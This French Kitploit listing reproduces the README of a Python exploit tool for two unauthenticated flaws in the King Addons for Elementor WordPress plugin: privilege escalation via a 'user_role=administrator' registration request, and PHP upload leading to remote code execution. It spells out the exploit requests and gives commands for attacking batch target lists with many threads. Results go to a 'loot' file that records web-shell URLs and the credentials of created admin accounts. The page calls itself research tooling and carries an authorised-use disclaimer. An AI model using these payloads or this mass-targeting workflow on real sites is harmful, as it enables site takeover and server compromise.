Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-6325_CVE-2025-6327 — PoC Python validant CVE-2025-6325, une élévation de privilèges non authentifiée, et CVE-2025-6327, une RCE par téléversement de fichier arbitraire, dans King Addons for Elementor <= 51.1.36. | Kitploit
Outils/GitHubGitHub/johenlastgen-jlg/cve-2025-6325_cve-2025-6327
Escalade de PrivilègesScanners de VulnérabilitésAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionRed TeamingCrawler

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Développement de Charges Utiles
GitHubjohenlastgen-jlg/cve-2025-6325_cve-2025-6327

CVE-2025-6325_CVE-2025-6327

PoC Python validant CVE-2025-6325, une élévation de privilèges non authentifiée, et CVE-2025-6327, une RCE par téléversement de fichier arbitraire, dans King Addons for Elementor <= 51.1.36.

Voir le dépôt
il y a 7h 58mPas encore vérifié

CVE-2025-6325 + CVE-2025-6327

King Addons for Elementor — PoC d'exploitation double

Outil de recherche et de validation pour King Addons for Elementor <= 51.1.36, couvrant deux vulnérabilités documentées :

  • CVE-2025-6325 — Élévation de privilèges non authentifiée
  • CVE-2025-6327 — Téléversement de fichier arbitraire non authentifié menant à une RCE

Uniquement pour les tests de sécurité autorisés, la recherche de vulnérabilités et les environnements de laboratoire contrôlés.


Aperçu

Ce projet fournit un PoC à double usage pour valider l'impact de sécurité de deux vulnérabilités dans King Addons for Elementor.

CVE-2025-6325

Élévation de privilèges non authentifiée via la fonctionnalité d'inscription de King Addons.

Le flux vulnérable accepte une valeur user_role contrôlée par le client et la transmet à la création d'utilisateur WordPress sans appliquer de liste blanche de rôles appropriée.

Version affectée : <= 51.1.36 Version corrigée : 51.1.37

Le flux d'inscription vulnérable utilise :

root@kitploit:~
POST /wp-admin/admin-ajax.php
action=king_addons_user_register
user_role=administrator

Le PoC vérifie également si le compte créé peut s'authentifier et accéder à la page d'administration des utilisateurs WordPress.

CVE-2025-6327

Téléversement de fichier arbitraire non authentifié via la fonctionnalité de téléversement du constructeur de formulaires de King Addons.

Le gestionnaire de téléversement vulnérable peut accepter incorrectement un fichier PHP, entraînant un fichier téléversé accessible via le web et une exécution de code côté serveur potentielle.

Version affectée : <= 51.1.36 Version corrigée : 51.1.37

L'action AJAX concernée est :

root@kitploit:~
POST /wp-admin/admin-ajax.php
action=king_addons_upload_file

Le PoC valide le flux de téléversement et vérifie si le fichier de test téléversé peut exécuter une commande id bénigne.


Fonctionnalités

  • Validation de double vulnérabilité
  • Validation de l'élévation de privilèges CVE-2025-6325
  • Validation du téléversement/RCE CVE-2025-6327
  • Mode de découverte passive de nonce
  • Test sur cible unique
  • Prise en charge d'une liste de cibles par lots
  • Exécution multi-threadée
  • Exploration automatique des pages
  • Découverte de sitemap
  • Profondeur d'exploration configurable
  • Nombre maximal de pages configurable
  • Délai d'expiration HTTP configurable
  • Sortie des résultats au format TSV
  • Sortie de validation réussie / loot
  • Sortie terminal sans couleur optionnelle
  • Bibliothèque standard Python uniquement

Le script prend en charge quatre modes de fonctionnement :

root@kitploit:~
check
privesc
upload
both

Ces modes sont exposés directement par l'interface en ligne de commande.


Prérequis

Python 3 est requis.

Aucun paquet Python tiers n'est requis.

Vérifiez votre version de Python :

root@kitploit:~
python3 --version

Utilisation

Cible unique

Exécuter les deux vérifications de vulnérabilité :

root@kitploit:~
python3 exploit.py -u http://target.local --exploit both

Vérification passive

Découvrir les nonces King Addons exposés sans exécuter les étapes d'exploitation :

root@kitploit:~
python3 exploit.py -u http://target.local --exploit check

Validation de l'élévation de privilèges

root@kitploit:~
python3 exploit.py -u http://target.local --exploit privesc

Validation du téléversement/RCE

root@kitploit:~
python3 exploit.py -u http://target.local --exploit upload

Cibles par lots

Créez un fichier de cibles :

root@kitploit:~
http://target1.local
https://target2.local
http://target3.local

Les commentaires et les lignes vides sont ignorés.

Exécuter une évaluation passive :

root@kitploit:~
python3 exploit.py -l targets.txt --exploit check

Exécuter les deux étapes de validation :

root@kitploit:~
python3 exploit.py -l targets.txt --exploit both -t 20

Exécuter la validation du téléversement :

root@kitploit:~
python3 exploit.py -l targets.txt --exploit upload -t 20

Exécuter la validation de l'élévation de privilèges :

root@kitploit:~
python3 exploit.py -l targets.txt --exploit privesc -t 20

Options d'exploration

Le PoC recherche automatiquement dans les pages cibles les nonces requis par les deux flux vulnérables.

Paramètres d'exploration par défaut :

root@kitploit:~
Depth      : 3
Max pages  : 80
Timeout    : 20 seconds
Threads    : 10

Ces valeurs par défaut sont définies dans la configuration CLI du script.

Exemple :

root@kitploit:~
python3 exploit.py \
  -l targets.txt \
  --exploit both \
  -t 20 \
  --depth 3 \
  --max-pages 80 \
  --timeout 20

Options en ligne de commande

Le script utilise par défaut results.tsv pour les résultats structurés et loot.txt pour les entrées de validation réussies.


Sortie

Pendant l'exécution, l'outil signale plusieurs états.

SHELL

Indique que la validation du téléversement a réussi et que le fichier PHP de test a répondu à la requête de vérification.

Exemple :

root@kitploit:~
PWNED [SHELL]

PRIV

Indique que la validation de l'élévation de privilèges a créé un compte en utilisant le flux d'inscription vulnérable.

L'outil enregistre également si le compte a été vérifié sur la page d'administration des utilisateurs WordPress.

VERIFIED

Le compte créé a été authentifié avec succès et confirmé sur la page des utilisateurs WordPress.

UNVERIFIED

La requête d'inscription a réussi, mais l'étape de vérification suivante n'a pas pu confirmer le compte résultant.

CLEAN

Aucun résultat de validation réussi n'a été obtenu.

ERR

La cible a produit une erreur réseau, d'analyse, d'exploration ou autre erreur d'exécution.


Résultats

Les résultats structurés sont écrits au format TSV :

root@kitploit:~
results.tsv

La sortie contient des champs pour :

root@kitploit:~
target
status
shell_url
shell_rce
priv_user
priv_pwd
priv_verified
err

Ce format est utile pour importer les résultats dans des tableurs ou pour un traitement ultérieur.

Les entrées de validation réussies sont également écrites dans :

root@kitploit:~
loot.txt

Le script écrit les résultats de shell et de validation de privilèges comme des entrées distinctes.


Flux de vulnérabilité

CVE-2025-6325

root@kitploit:~
Visitor
   │
   ▼
Public King Addons Register Form
   │
   ▼
Nonce discovery
   │
   ▼
king_addons_user_register
   │
   ▼
Client-controlled user_role
   │
   ▼
WordPress user creation
   │
   ▼
Privilege escalation validation

Le PoC soumet spécifiquement :

root@kitploit:~
user_role=administrator

au point de terminaison d'inscription.

CVE-2025-6327

root@kitploit:~
Visitor
   │
   ▼
King Addons Form Builder
   │
   ▼
Upload nonce discovery
   │
   ▼
king_addons_upload_file
   │
   ▼
PHP test file upload
   │
   ▼
Uploaded file URL
   │
   ▼
Benign execution verification

Le PoC utilise un nom de fichier de test généré de manière unique et vérifie l'URL de téléversement retournée.


Vérification en laboratoire

L'implémentation de recherche a été testée contre :

root@kitploit:~
WordPress 6.8 / 7.1
Elementor 4.2.3
King Addons 51.1.14

Les notes de recherche rapportent une validation réussie des deux flux dans un environnement de laboratoire contrôlé, incluant l'élévation de privilèges et l'exécution de shell. Un contrôle négatif a également été testé contre la version 51.1.37.


Note importante sur les versions

Les notes de recherche indiquent que certaines versions ZIP de WordPress.org pour 51.1.35 et 51.1.36 ont été ultérieurement réétiquetées avec des correctifs partiels.

L'implémentation vulnérable a donc été confirmée en utilisant le tag SVN référencé 51.1.14.

Si vous reproduisez la recherche, utilisez la version et le paquet exacts identifiés par la recherche plutôt que de supposer que chaque paquet étiqueté 51.1.35 ou 51.1.36 contient un code vulnérable identique.


Utilisation responsable

Ce projet est destiné à :

  • Tests d'intrusion autorisés
  • Recherche de vulnérabilités
  • Validation de sécurité
  • Environnements CTF
  • Laboratoires de test locaux
  • Recherche en sécurité défensive

Ne testez que les systèmes pour lesquels vous disposez d'une autorisation explicite.

N'utilisez pas ce projet contre une infrastructure tierce sans autorisation.

L'auteur n'encourage pas l'accès non autorisé, la persistance, le vol de données ou la perturbation de systèmes.


Avertissement

Ce logiciel est fourni à des fins de recherche en sécurité et de tests autorisés.

Il vous incombe de vous assurer que votre utilisation de ce projet est conforme aux lois, réglementations, contrats et exigences d'autorisation applicables.

L'auteur et les contributeurs n'assument aucune responsabilité pour toute utilisation abusive, tout dommage, toute interruption de service, toute perte de données ou toute autre conséquence résultant d'une utilisation non autorisée.


Auteur

JohenLastGen — JLG NETWORK

Research & Security Tooling

Telegram :

@johenlastgen

Canal :

@jlgnetworkredirect


Licence

MIT License

Voir LICENSE pour le texte complet de la licence.

Télécharger l’outil
OptionDescription
-u, --urlTester une URL cible unique
-l, --listFichier contenant les URL cibles
-e, --exploitSélectionner check, privesc, upload ou both
-t, --threadsNombre de workers simultanés
--depthProfondeur maximale des liens d'exploration
--max-pagesNombre maximal de pages explorées par cible
--timeoutDélai d'expiration des requêtes HTTP en secondes
-o, --outputSortie des résultats TSV
--lootSortie des validations réussies
--no-colorDésactiver les couleurs du terminal